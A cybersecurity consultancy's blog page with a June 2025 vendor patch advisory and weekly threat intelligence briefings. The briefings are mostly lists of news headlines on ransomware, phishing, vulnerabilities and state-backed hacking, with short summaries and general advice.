APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware

Multiple Chrome Vulnerabilities Allow Attackers to Execute Malicious Code Remotely

Attackers exploit Fortinet flaws to deploy Qilin ransomware

Over 84,000 Roundcube instances vulnerable to actively exploited flaw

Ivanti Workspace Control hardcoded key flaws expose SQL credentials

Zero Day Initiative — The June 2025 Security Update Review

Palo Alto Networks Patches Privilege Escalation Vulnerabilities - SecurityWeek

Fortinet, Ivanti Patch High-Severity Vulnerabilities - SecurityWeek

Chrome, Firefox Updates Resolve High-Severity Memory Bugs - SecurityWeek

Trend Micro fixes critical vulnerabilities in multiple products

ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks

Google patched bug leaking phone numbers tied to accounts

SAP June 2025 Security Patch Day fixed critical NetWeaver bug

Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks

PayU Plugin Flaw Allows Account Takeover on 5000 WordPress Sites - Infosecurity Magazine

Five Zero-Days, 15 Misconfigurations Found in Salesforce Industry Cloud - SecurityWeek

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 11/06/2025 Black Arrow Admin 11/06/2025

Black Arrow Cyber Advisory 11 June 2025 – Security Updates from Microsoft, Adobe, Ivanti, Salesforce, SAP, and Google

Executive Summary

Microsoft’s Patch Tuesday for June 2025 delivered updates for 66 vulnerabilities, including one actively exploited zero‑day WebDAV remote code execution flaw, alongside nine critical issues such as RCE and privilege escalation in SMB, SharePoint, and Windows Hello for Business.

Adobe patched a number of vulnerabilities addressing critical and important vulnerabilities in Acrobat/Reader, InCopy, and Commerce/Magento—notably patching 254 flaws in Adobe Experience Manager (mostly XSS) and a critical Magento XSS flaw (CVE‑2025‑47110) with potential for arbitrary code execution.

Ivanti’s June advisory fixes multiple high-severity issues in Workspace Control (e.g., SQL credential decrypt) and addresses vulnerabilities in EPMM previously exploited in the wild (CVE‑2025‑4427/4428).

Salesforce Industry Cloud fixed five zero‑days and 15 critical misconfigurations that risk unauthorised access to encrypted data, sessions, credentials, and business logic.

SAP released its June Security Patch Day, addressing 19 notes including a critical NetWeaver RFC missing authorisation flaw (CVE 2025 42989, CVSS 9.6) that allows privilege escalation

Google Chrome received a security update fixing two high severity remote code execution (RCE) bugs in the V8 engine impacting Windows, macOS, and Linux users

What’s the risk to me or my business?

The presence of actively exploited zero‑days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

Microsoft

Further details on specific updates within this Microsoft patch Tuesday can be found here:

June 2025 Security Updates - Release Notes - Security Update Guide - Microsoft

Adobe, Ivanti, Salesforce, SAP, and Google

Further details of the vulnerabilities in affected Adobe, Ivanti, SAP and Google:

https://helpx.adobe.com/security/security-bulletin.html

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Workspace-Control-CVE-2025-5353-CVE-CVE-2025-22463-CVE-2025-22455

https://appomni.com/blog/low-code-high-stakes-salesforce-security/

https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html

https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_10.html

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin 08/06/2025 Black Arrow Admin 08/06/2025

Black Arrow Cyber Threat Intelligence Briefing 06 June 2025

Black Arrow Cyber Threat Intelligence Briefing 06 June 2025:

-Half of Firms Suffer Two Supply Chain Incidents in Past Year

-Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA

-UK SMBs Are Ramping Up Cyber Security Spending

-CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership

-CISO 3.0: Leading AI Governance and Security in the Boardroom

-Play Ransomware Breached 900 Victims, Including Critical Orgs

-Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady

-Role of Threat Intelligence in Proactive Defence Strategies

-Beware GenAI Use is Outpacing Security Controls

-Why Teenage Hackers Pose More Danger Than Ever

-‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy

-Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence

Executive Summary

Our review this week includes the complexity of cyber risk, with UK organisations reporting a sharp rise in supply chain-related incidents and limited visibility across third-party networks. As we discuss in our training events, vendor email compromise (VEC) is growing in prominence alongside BEC, exploiting trust in external partners to evade detection. Organisations need to review their control framework, including training staff and leaders on identifying and reporting suspicious communications, and adhering to the letter and spirit of operational controls that attackers seek to exploit.

We also explore the shifting role of the CISO, now increasingly embedded in strategic business leadership. As AI becomes more integrated into operations, CISOs must balance innovation with governance, mastering risk management to promote responsible adoption. The rise of fractional CISOs offers small and medium firms access to broad expertise at lower cost, which we provide for our clients. Threat actors continue to evolve, with ransomware groups like Play expanding their reach, and teenage hackers blurring the line between mischief and organised crime.

The UK’s Ministry of Defence has disclosed a thwarted spear-phishing campaign by Russia-linked actors posing as journalists, part of over 90,000 state-linked threats in two years. This highlights the growing use of cyber operations in geopolitical conflict. Finally, the unmonitored use of generative AI tools is accelerating, raising concerns about data loss and regulatory breaches. Black Arrow recommends that leaders prioritise visibility across supply chains, invest in adaptive security training by experts, and align AI and threat intelligence strategies with robust governance frameworks.

Governance, Risk and Compliance

CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership

CISO 3.0: Leading AI governance and security in the boardroom - Help Net Security

CISO Stature Rises, but Budgets Remain Tight

UK SMBs are ramping up cyber security spending – and it’s about time | IT Pro

Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions

Building a Cyber-Resilient Organisation CISOs Roadmap

Is Your CISO Navigating Your Flight Path?

What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget

Breaking Down Silos Aligning IT and Security Teams

Cyber security top investment priority with tech leaders

Are you cyber resilient? Five traits that define the leaders of 2025 | SC Media

Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly

Creating the right organisational culture for cyber security - NCSC.GOV.UK

6 hard truths security pros must learn to live with | CSO Online

Why hacking yourself first is essential for proactive cyber security | TechRadar

From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK

What Is Cyber Threat Intelligence: Quick Guide For CISOs

Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly

53% of cyber department leaders eyeing the exit | CSO Online

Cyber security Needs Satellite Navigation, Not Paper Maps - Security Boulevard

Threats

Ransomware, Extortion and Destructive Attacks

FBI: Play ransomware breached 900 victims, including critical orgs

Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine

Do-It-Yourself Cyber Attack Tools Are Booming - WSJ

6 rising malware trends every security pro should know | CSO Online

Scattered Spider: Three things the news doesn’t tell you

Play ransomware groups use SimpleHelp flaw: FBI • The Register

Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady

Mysterious leaker outs Conti ransomware kingpins • The Register

Interlock ransomware: what you need to know | Tripwire

Cops in Germany Claim They’ve ID’d the Mysterious Trickbot Ransomware Kingpin | WIRED

New ChatGPT Scam Infects Users With Ransomware: ‘Exercise Extreme Caution’

When ransomware listings create confusion as to who the victim was – DataBreaches.Net

Cyber attacks: What do hackers do with your data?

Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek

ViLE gang members sentenced for DEA portal breach, extortion

Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews

Ransomware and USB attacks are hammering OT systems - Help Net Security

Ransomware Victims

FBI: Play ransomware breached 900 victims, including critical orgs

Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks

M&S hackers sent abuse and ransom demand directly to CEO - BBC News

Volkswagen investigates hacker data breach claims | Cybernews

Victoria's Secret Says It Will Postpone Earnings Report After Recent Security Breach - SecurityWeek

Interlock ransomware claims Kettering Health breach, leaks stolen data

After $1 Million Ransom Demand, Virgin Islands Lottery Restores Operations Without Paying Hackers – DataBreaches.Net

A cyber attack hit hospitals operated by Covenant Health

Next beefs up customer security amid retail hacking crisis - UKTN

Phishing & Email Based Attacks

Do-It-Yourself Cyber Attack Tools Are Booming - WSJ

Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions

Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register

Phishing Campaign Uses Fake Booking.com Emails to Deliver Malware - Infosecurity Magazine

VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert

Cyber attacks: What do hackers do with your data?

Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register

Beware of Device Code Phishing

Where Did The Name 'Phishing' Come From?

Business Email Compromise (BEC)/Email Account Compromise (EAC)

VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert

Other Social Engineering

Beware of Device Code Phishing

North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ

Thwart nation-state threat actors with these CISO tips | TechTarget

Vishing Crew Targets Salesforce Data

ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek

Fraud, Scams and Financial Crime

Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register

FBI Warns of Filipino Tech Company Running Crypto Scams

Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek

Law enforcement seized the carding marketplace BidenCash

DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop

Google survey shows Americans are changing how they fight scams - Help Net Security

Scammer Reported To FBI & Cyber Crime Agency After Conning TV Writers

Airbnb scams: new book explores thriving criminal activity on big tech platforms

Artificial Intelligence

British businesses increasingly adopting AI despite rise in cyber security risks: QBE - Reinsurance News

Vibe coding is here to stay. Can it ever be secure? | CyberScoop

CISOs beware: genAI use is outpacing security controls | CSO Online

Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware

Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly

The hidden security risks of open source AI | Computer Weekly

AI Emerges as the Top Concern for Security Leaders | Security Magazine

Combatting the Threat of AI Misuse | SC Media UK

The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED

96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET

Companies Are Discovering a Grim Problem With "Vibe Coding"

The security debt of browsing AI agents | TechRadar

Researchers Bypass Deepfake Detection With Replay Attacks

AI agents make great teammates, but don't let them code alone - here's why | ZDNET

Hackers are using fake tool installers to dupe victims – and AI tools like ChatGPT are a key target | IT Pro

2FA/MFA

Stolen Credentials and Missing MFA Continue to Fuel Breaches, Create MSSP Risk and Opportunity | MSSP Alert

Malware

Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions

6 rising malware trends every security pro should know | CSO Online

Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware

Hackers are using fake tool installers to dupe victims – and AI tools like ChatGPT are a key target | IT Pro

Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine

International operation takes down crypting sites used for testing malware | The Record from Recorded Future News

Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack

New versions of Chaos RAT target Windows and Linux systems

FBI: BADBOX 2.0 Android malware infects millions of consumer devices

ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek

Backdoored Open Source Malware Repositories Target Novice Cyber Criminals - SecurityWeek

US offers $10M for tips on state hackers tied to RedLine malware

Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware

Hacker targets other hackers and gamers with backdoored GitHub code

Mobile

Dangerous new Android malware adds fake contacts to your phone while draining bank accounts — how to stay safe | Tom's Guide

Android banking trojan Crocodilus rapidly evolves and goes global

FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe

Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop

Android malware trends: Stealthier, easier-to-use | Intel 471

Beware of Device Code Phishing

Denial of Service/DoS/DDoS

Major DDoS attack disrupts Moscow’s internet services | SC Media

Internet of Things – IoT

FBI: BADBOX 2.0 Android malware infects millions of consumer devices

Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent

Data Breaches/Leaks

ConnectWise Breached, ScreenConnect Customers Targeted

Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register

Volkswagen investigates hacker data breach claims | Cybernews

Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek

ViLE gang members sentenced for DEA portal breach, extortion

Cartier discloses data breach amid fashion brand cyber attacks

The North Face warns customers of April credential stuffing attack

Hackers Leak 86 Million AT&T Records with Decrypted SSNs

Order of Psychologists of Lombardy fined 30,000 € for inadequate data security protection and detection following ransomware attack – DataBreaches.Net

Organised Crime & Criminal Actors

Do-It-Yourself Cyber Attack Tools Are Booming - WSJ

Why teenage hackers pose more danger than ever

Websites selling hacking tools to cyber criminals seized – DataBreaches.Net

US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation

How global collaboration is hitting cyber criminals where it hurts - Help Net Security

Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly

Cyber attacks: What do hackers do with your data?

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

FBI Warns of Filipino Tech Company Running Crypto Scams

Hacker arrested for breaching 5,000 hosting accounts to mine crypto

DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop

BitMEX discovers cybersecurity lapses in North Korea hacker group

The US government is now a bitcoin whale. That has consequences | American Banker

Insider Risk and Insider Threats

North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ

FBI arrests DoD IT worker, claim he tried to leak intel • The Register

Thwart nation-state threat actors with these CISO tips | TechTarget

Insurance

Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady

Companies Looking to Cyber Liability Insurance

Supply Chain and Third Parties

ConnectWise Breached, ScreenConnect Customers Targeted

Play ransomware groups use SimpleHelp flaw: FBI • The Register

What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget

Half of Firms Suffer Two Supply Chain Incidents in Past Year - Infosecurity Magazine

Outages

SentinelOne: Last week’s 7-hour outage caused by software flaw

Identity and Access Management

Don’t let dormant accounts become a doorway for cyber criminals

Encryption

FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe

MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek

Inside The Coming Quantum Crisis: Why CEOs Must Prepare For Q-Day Now

The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation

Linux and Open Source

Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine

New versions of Chaos RAT target Windows and Linux systems

New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora

Passwords, Credential Stuffing & Brute Force Attacks

New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora

Account Lockout Policy: Setup and Best Practices Explained | TechTarget

Don’t let dormant accounts become a doorway for cyber criminals

Stolen Credentials and Missing MFA Continue to Fuel Breaches, Create MSSP Risk and Opportunity | MSSP Alert

Social Media

Meta is now a defence contractor • The Register

Training, Education and Awareness

Is HR running your employee security training? Here’s why that’s not always the best idea | CSO Online

Building a Scalable Cyber Security Training Program

Regulations, Fines and Legislation

Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine

The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine

Vodafone Germany Fined $51 Million Over Privacy, Security Failures - SecurityWeek

Data watchdog put cops on naughty step for lost CCTV footage • The Register

US Banks Seek to Limit Cyber Attack Disclosures

Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop

‘I do not have confidence’ that US infrastructure is cyber-secure, former NSC official says - Nextgov/FCW

Slashing CISA Is a Gift to Our Adversaries

The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation

Trump's Cyber Pick Vows Interagency Cooperation if Confirmed

Senator hounds Trump’s cyber pick over CISA cuts • The Register

Models, Frameworks and Standards

The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine

MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek

Data Protection

Data watchdog put cops on naughty step for lost CCTV footage • The Register

Careers, Working in Cyber and Information Security

Cyber Security Market Industry Report 2025 | Rising Demand for Cyber Security Professionals, Over 3.5 Million Positions Unfilled Globally - ResearchAndMarkets.com

CIOs get serious about closing the skills gap — mainly from within | CIO

PTSD Resolution and CIISec to offer therapy to cyber workers

53% of cyber department leaders eyeing the exit | CSO Online

Law Enforcement Action and Take Downs

Hacker arrested for breaching 5,000 hosting accounts to mine crypto

Websites selling hacking tools to cyber criminals seized – DataBreaches.Net

US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation

How global collaboration is hitting cyber criminals where it hurts - Help Net Security

Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly

International operation takes down crypting sites used for testing malware | The Record from Recorded Future News

Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek

ViLE gang members sentenced for DEA portal breach, extortion

Law enforcement seized the carding marketplace BidenCash

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

UK CyberEM Command to spearhead new era of armed conflict • The Register

The UK Brings Cyberwarfare Out of the Closet - SecurityWeek

Nation State Actors

‘States don’t do hacking for fun’: NCSC expert urges businesses to follow geopolitics as defensive strategy | IT Pro

Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek

Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?

New Crucial Guidance To Empower Nations To Develop Legal Positions On Cyber Operations – Eurasia Review

China

China accuses Taiwan and the US of being feeble hackers • The Register

Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent

Russia

Damascened Peacock: Russian hackers targeted UK Ministry of Defence

Russian hybrid warfare: Ukraine's success offers lessons for Europe - Atlantic Council

Ukraine's enduring cyber defence: Assessing resilience and impact of shifting international support

US offers $10M for tips on state hackers tied to RedLine malware

Russian hackers target Greek company | Ukrainska Pravda

Ukraine's military intelligence claims cyber attack on Russian strategic bomber maker | The Record from Recorded Future News

Ukraine takes second strike at Russians with Tupolev hack • The Register

Major DDoS attack disrupts Moscow’s internet services | SC Media

Moscow Poses No Threat to Britain, Says Russia's UK Embassy

Iran

Iranian APT 'BladedFeline' Hides in Network for 8 Years

North Korea

North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ

DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop

BitMEX discovers cyber security lapses in North Korea hacker group

Tools and Controls

What Is Cyber Threat Intelligence: Quick Guide For CISOs

Vibe coding is here to stay. Can it ever be secure? | CyberScoop

Companies Are Discovering a Grim Problem With "Vibe Coding"

From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK

Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE

Role of Threat Intelligence in Proactive Defence Strategies

Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek

Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?

Play ransomware groups use SimpleHelp flaw: FBI • The Register

What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget

The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED

AI agents make great teammates, but don't let them code alone - here's why | ZDNET

CISO Stature Rises, but Budgets Remain Tight

Building a Cyber-Resilient Organisation CISOs Roadmap

Cyber security top investment priority with tech leaders

Why hacking yourself first is essential for proactive cyber security | TechRadar

Beyond the Broken Wall: Why the Security Perimeter Is Not Enough

A comprehensive new guide to today’s hazards | UNDRR

CISOs need better tools to turn risk into action - Help Net Security

Account Lockout Policy: Setup and Best Practices Explained | TechTarget

Don’t let dormant accounts become a doorway for cyber criminals

96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET

Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek

48% of security pros are falling behind compliance requirements - Help Net Security

Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware

Researchers Bypass Deepfake Detection With Replay Attacks

Agentic AI and the risks of unpredictable autonomy - Help Net Security

DNS Hijacking, A Major Cyber Threat for the UK Government - Infosecurity Magazine

Other News

A comprehensive new guide to today’s hazards | UNDRR

Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE

Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks

Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly

UK Defence Review: “Making Britain safer/secure at home, and strong abroad” - EDR Magazine

UK military building “pioneering battlefield system” with new Cyber and Electromagnetic Command | TechRadar

New spying claims emerge in Silicon Valley corporate espionage scandal

‘I do not have confidence’ that US infrastructure is cyber-secure, former NSC official says - Nextgov/FCW

Danish energy sector probes removes concerns about solar involvement – pv magazine International

Cyber Security Needs Satellite Navigation, Not Paper Maps - Security Boulevard

Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews

CISOs Guide to Navigating the 2025 Threat Landscape

The Secret Defence Strategy of Four Critical Industries Combating Advanced Cyber Threats

Vulnerability Management

Filling the Gap with the European Vulnerability Database

Future-ready cyber security: Lessons from the MITRE CVE crisis | CyberScoop

Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop

Slashing CISA Is a Gift to Our Adversaries

Seven Steps to Building a Mature Vulnerability Management Program - Infosecurity Magazine

Vulnerabilities

Technical Details Published for Critical Cisco IOS XE Vulnerability - SecurityWeek

Two Linux flaws can lead to the disclosure of sensitive data

SentinelOne: Last week’s 7-hour outage caused by software flaw

Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop

New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch

Microsoft ships emergency patch to fix Windows 11 startup failures

Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code

Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI

Questions Swirl Around ConnectWise Flaw Used in Attacks

Hackers are exploiting critical flaw in vBulletin forum software

Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU

vBulletin Vulnerability Exploited in the Wild - SecurityWeek

HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass

Why SAP security updates are a struggle for large enterprises - Help Net Security

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 01/06/2025 Black Arrow Admin 01/06/2025

Black Arrow Cyber Threat Intelligence Briefing 30 May 2025

Black Arrow Cyber Threat Intelligence Briefing 30 May 2025:

-New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware

-The Hidden Cyber Risks in Your Executive Team’s Digital Footprint

-Mandatory Ransomware Payment Disclosure Begins in Australia

-Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW

-Cyber Security Teams Generate Average of $36M in Business Growth

-M&S Boss: I Went into Shock over Cyber Attack

-Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware

-AI Is Perfecting Scam Emails, Making Phishing Hard to Catch

-4.5% of Breaches Now Extend to Fourth Parties

-Any Teenager Can Be a Cyber Attacker Now, Parents Warned

-New Russian State Hacking Group Hits Europe and North America

-DragonForce Engages in "Turf War" for Ransomware Dominance

Executive Summary

This week’s review highlights the growing risks facing senior executives, with threat actors increasingly targeting C-suite leaders through tailored spear-phishing campaigns and exploiting their digital footprints. A recent study reports cyber risk as the top reputational concern for senior leaders globally, yet most organisations remain unprepared to model the business impact of such events, while the CEO of M&S highlights the personal effects of experiencing a cyber attack. By contrast, we report on a study that has assessed the business value of including cyber security at the outset of business initiatives.

We also report on the evolution of attack tactics, including disguising ransomware and malware as legitimate AI tools, and enabling teenagers with limited technical skills to conduct attacks. The cyber threat landscape remains volatile, with criminal groups exploiting AI hype, expanding supply chain attack vectors, and even competing for dominance amongst their peers.

Finally, Australia now requires companies to report ransomware payments, which we see as part of a growing drive for transparency that builds on current and forthcoming legislation in other jurisdictions.

Black Arrow recommends that business leaders should ensure they perform an objective assessment of their cyber risks, and address those risks through controls across people, operations and technology aligned to a respected framework underpinned by robust governance.

Governance, Risk and Compliance

Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance

Welcome to the age of cyber insecurity in business

M&S boss: I went into shock over cyber attack

Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge

4.5% of breaches now extend to fourth parties - Help Net Security

When leaders ignore cyber security rules, the whole system weakens | Computer Weekly

The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard

Cyber Security Teams Generate Average of $36M in Business Growth - Infosecurity Magazine

Why Cyber Security Is Shifting From Detection To Performance

Organisations Must Train, Not Just Plan, for Crisis Events, Advises IT Research and Advisory Firm Info-Tech Research Group

Incident Response Planning - Preparing for Data Breaches

Explaining What’s Happened in a Cyber Attack Is Challenging

Threats

Ransomware, Extortion and Destructive Attacks

DragonForce used MSP's RMM software to distribute ransomware • The Register

DragonForce Engages in "Turf War" for Ransomware Dominance - Infosecurity Magazine

Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech

Cyber criminals exploit AI hype to spread ransomware, malware

Any teenager can be a cyber attacker now, parents warned

Why the record-breaking number of cyber attacks could be a prelude to the ‘big one’ | The Independent

In cyber attacks, humans can be the weakest link

Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert

How CISOs can defend against Scattered Spider ransomware attacks | CSO Online

Silent Ransom Group targeting law firms, the FBI warns

FBI warns of Luna Moth extortion attacks targeting law firms

UK, US Police Target Ransomware Gangs In Latest Action | Silicon

Sophos warns MSPs over DragonForce threat | Microscope

'Everest Group' Extorts Global Orgs via SAP's HR Tool

Robbinhood ransomware: Iranian man pleads guilty to cyber crime that cost US government millions | The National

The Uber of the underworld

'Kisses from Prague': The fall of a Russian ransomware giant

The rise and rise of ransomware - Chris Skinner's blog

Ransomware Victims

Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech

M&S hack may have been caused by security issues at Indian IT giant Tata Consultancy Services | TechRadar

M&S boss: I went into shock over cyber attack

In cyber attacks, humans can be the weakest link

M&S boss Stuart Machin vows... We intend to come back better and stronger than ever after cyber attack | This is Money

Comment on M&S cyber attack: Cyber security is not enough… you need to be cyber resilient | Buckinghamshire New University

Retail attacks put cyber security in the spotlight | ICAEW

Silent Ransom Group targeting law firms, the FBI warns

FBI warns of Luna Moth extortion attacks targeting law firms

Robbinhood ransomware: Iranian man pleads guilty to cyber crime that cost US government millions | The National

Hackers just hit a $5B hospital empire, demand ransom | Cybernews

Nova Scotia Power Confirms Ransomware Attack, 280k Notified of Data Breach - SecurityWeek

Luxury jet company allegedly faces data breach | Cybernews

Nova Scotia Power confirms it was hit by ransomware

The rise and rise of ransomware - Chris Skinner's blog

Victoria’s Secret Website Taken Offline After Cyber Attack - SecurityWeek

Phishing & Email Based Attacks

How to spot phishing emails now that AI has cleaned up the typos

New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware

'Haozi' Gang Sells Turnkey Phishing Tools to Amateurs

Less than eight percent of top domains implement the toughest DMARC protection

Threat actors abuse Google Apps Script in evasive phishing attacks

Threat Actors Impersonate Fake Docusign Notifications To Steal Corporate Data

This dangerous new phishing scam spoofs a top Google program to try and hack Facebook accounts | TechRadar

Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign

The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech

New Browser Exploit Technique Undermines Phishing Detection - Infosecurity Magazine

New Russian cyber-spy crew Laundry Bear joins the pack • The Register

What to do if your Facebook account has been phished, hacked, stolen

Gone phishing: the rise of retail cyber crime in four charts

‘Secure email’: A losing battle CISOs must give up | CSO Online

Other Social Engineering

In cyber attacks, humans can be the weakest link

Cyber criminals exploit AI hype to spread ransomware, malware

Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET

The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard

